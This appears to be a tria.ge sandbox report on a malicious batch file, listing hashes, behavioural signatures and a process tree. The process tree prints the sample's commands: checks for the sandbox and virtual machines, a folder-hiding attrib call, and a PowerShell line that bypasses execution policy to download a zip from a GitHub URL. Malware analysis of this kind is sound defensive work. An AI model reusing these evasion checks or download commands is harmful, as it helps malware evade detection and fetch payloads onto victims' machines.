Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel:   120s
  max time network:  120s
  platform:          windows7_x64
  resource:          win7-20240903-en
  resource tags:     arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted:         22/01/2025, 17:56
Static task
  static1
Behavioral task
  behavioral1   Sample: .bat   Resource: win7-20240903-en
Behavioral task
  behavioral2   Sample: .bat   Resource: win10v2004-20241007-en
General
  Target:  .bat
  Size:    35KB
  MD5:     e0f14d8b4e040e347ac4c68fa65ab34d
  SHA1:    7792151bebcc851456faf92760e66e63fd9db8b8
  SHA256:  7944c6a800e3956afceb244e4b58d6368858879cef8d225c0c870646e29405d5
  SHA512:  cacaaef3f5184ed6a0c2f7655114dabeee7bf5e163d65a1758ba209ceeac97c5d79210fc0c6d1c98ff2ac9c1664ddbbde00f3587af1cc9983d0047a3c3205991
  SSDEEP:  768:x+R8e3f87iaNQeCOarasWNMb5yMqX/9MFRb:+3UdNQAarapE
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (signature name absent from the extracted report; taken from the process-tree entry for PID 1692)
  pid   Process
  1692  powershell.exe
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description           ioc                                          Process
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh   netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh   netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh   netsh.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
  pid   Process
  2580  systeminfo.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs
  pid   Process
  1692  powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
  description: Token adjusted   pid / Process as listed

  WMIC.exe (PID 2836), the same 20-token sequence recorded twice (40 IoCs):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
    33, 34, 35

  WMIC.exe (PID 2964), the same 20-token sequence once, then the first four tokens again (24 IoCs; the report's 64-entry list ends here):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
    33, 34, 35,
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege
Suspicious use of WriteProcessMemory 54 IoCs
  Each "PID X wrote to memory of Y" entry is recorded three times in the report (18 distinct entries, 54 IoCs).
  Source PID  Source process  Target PID  procid_target
  2708        cmd.exe         2812        31
  2812        net.exe         2832        32
  2708        cmd.exe         2724        33
  2724        cmd.exe         2716        34
  2708        cmd.exe         2940        35
  2708        cmd.exe         2576        36
  2708        cmd.exe         2116        37
  2708        cmd.exe         2804        38
  2708        cmd.exe         2836        39
  2708        cmd.exe         2596        40
  2708        cmd.exe         2580        42
  2708        cmd.exe         2588        43
  2708        cmd.exe         2964        45
  2708        cmd.exe         2960        46
  2708        cmd.exe         524         47
  2708        cmd.exe         2252        48
  2708        cmd.exe         2540        49
  2708        cmd.exe         1692        50
Views/modifies file attributes 1 TTPs 1 IoCs
  pid   Process
  2540  attrib.exe
Processes
(indentation shows parent/child depth; signatures hit by each process are listed under it)

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\.bat"
  PID: 2708
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe
      net session
      PID: 2812
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          PID: 2832

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c hostname
      PID: 2724
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\HOSTNAME.EXE
          hostname
          PID: 2716

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Khbthjfa "
      PID: 2940

    C:\Windows\system32\findstr.exe
      findstr /r /i ".*tria.*\.ge"
      PID: 2576

    C:\Windows\system32\netsh.exe
      netsh interface show interface
      PID: 2116
      - Event Triggered Execution: Netsh Helper DLL

    C:\Windows\system32\findstr.exe
      findstr /i "Triage"
      PID: 2804

    C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get model
      PID: 2836
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\findstr.exe
      findstr /i "VirtualBox VMware Hyper-V KVM"
      PID: 2596

    C:\Windows\system32\systeminfo.exe
      systeminfo
      PID: 2580
      - Gathers system information

    C:\Windows\system32\findstr.exe
      findstr /i "VirtualBox VMware Hyper-V"
      PID: 2588

    C:\Windows\System32\Wbem\WMIC.exe
      wmic bios get serialnumber
      PID: 2964
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\findstr.exe
      findstr /i "VBOX VMWARE"
      PID: 2960

    C:\Windows\System32\Wbem\WMIC.exe
      wmic nic get name
      PID: 524

    C:\Windows\system32\findstr.exe
      findstr /i "Virtual"
      PID: 2252

    C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Anon" /s /d
      PID: 2540
      - Views/modifies file attributes

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -Command "try { Invoke-WebRequest 'https://github.com/H8bs0lfVZviVo3nSSXLzzzz/ksawdarsffsff/raw/refs/heads/main/jsxbjJkH.zip' -OutFile 'jsxbjJkH.zip' } catch { Write-Error 'Download failed with error: $_'; exit 1 }"
      PID: 1692
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses